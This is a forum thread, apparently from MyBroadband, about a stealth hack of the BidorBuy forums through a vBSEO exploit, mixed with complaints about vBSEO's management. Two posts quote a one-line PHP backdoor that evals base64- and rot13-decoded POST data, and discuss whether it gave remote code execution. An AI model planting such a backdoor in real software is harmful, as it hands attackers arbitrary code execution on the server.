BidorBuy forums hit with stealth hack

VBSeo...

They lost focus on their product and then kicked Ilia out (http://admin-talk.com/threads/dear-...y-vbseo-is-suspending-operations.43684/page-3)
I am waiting for more VBSeo crap like this to crop up.

Was certainly not a good way how VBSEO dealt with their internal issues. There is unfortunately more to the story than what Ilia wants to make out. Unfortunately not many different options for discussion forums and even MyBB has seen a fair share of issues on their installation (which is probably a lot worse for them as it's part of their core business).
 
Was certainly not a good way how VBSEO dealt with their internal issues. There is unfortunately more to the story than what Ilia wants to make out. Unfortunately not many different options for discussion forums and even MyBB has seen a fair share of issues on their installation (which is probably a lot worse for them as it's part of their core business).

^^ why does the government not have an internet spokesperson

1609872_655620017829868_1082232269_n.jpg
 
Yup MD4E, and that is it actually.
How one deals with conflict, constructive criticism or downright *********ry... You can be calm and deal with it methodically, you can ignore it, or you can blame others :)

You should set up a school, teaching TheGov employees how to remove the chip on their shoulder, develop mutual respect and a decent work ethic.
 
Pesky swearword filters...

4$$h0l3ry is in fact a technical term... It's the description of a trolls behaviour. :)
 
If you're advertising, you're doomed

Magic dude etc said:
The VBSeo exploit does only affect SEO traffic and does not go beyond that - i.e. remote execution exploits or accessing file systems - either one would have not caused issues due to our environment.
This does not agree with the content posted to pastebin, which says:
PHP:
if (isset($_POST[$o])) eval(base64_decode(str_rot13($_POST[$o])));
Translation: assuming $o is initialized to some interesting value like 'o' during earlier parts of the decoding (not shown), this indicates that the attacker retained the ability to run arbitary code specified by
PHP:
base64_encode(str_rot13($evilcode))
This is code that has the privileges of the user running php. For large single installation sites, this user is generally www-data / apache / nobody. Unless php is running in a restricted root, there are or were probably privilege escalation options available, the box is rooted already.

Turning on advertising on a compromised web site means that control has been passed down the chain to people that do not care about whether their attack is detected or not.
 
Last edited:
Magic dude etc said:

This does not agree with the content posted to pastebin, which says:
PHP:
if (isset($_POST[$o])) eval(base64_decode(str_rot13($_POST[$o])));
Translation: assuming $o is initialized to some interesting value like 'o' during earlier parts of the decoding (not shown), this indicates that the attacker retained the ability to run arbitary code specified by
PHP:
base64_encode(str_rot13($evilcode))
This is code that has the privileges of the user running php. For large single installation sites, this user is generally www-data / apache / nobody. Unless php is running in a restricted root, there are or were probably privilege escalation options available, the box is rooted already.

Turning on advertising on a compromised web site means that control has been passed down the chain to people that do not care about whether their attack is detected or not.

True, although the script has the capability to execute arbitrary commands via HTTP-POST, no HTTP-POST was executed against the URL. Also when looking through the injected code, '$o' was not defined anywhere. The forum server runs on it's separate virtual which is chrooted/jailed and any attack would have been restricted within the jailed environment. We did audit the server for any remote execution and have not found any trace of it. The attacker was really just interested in attracting advertising revenue and nothing else.
 
Top
Sign up to the MyBroadband newsletter
X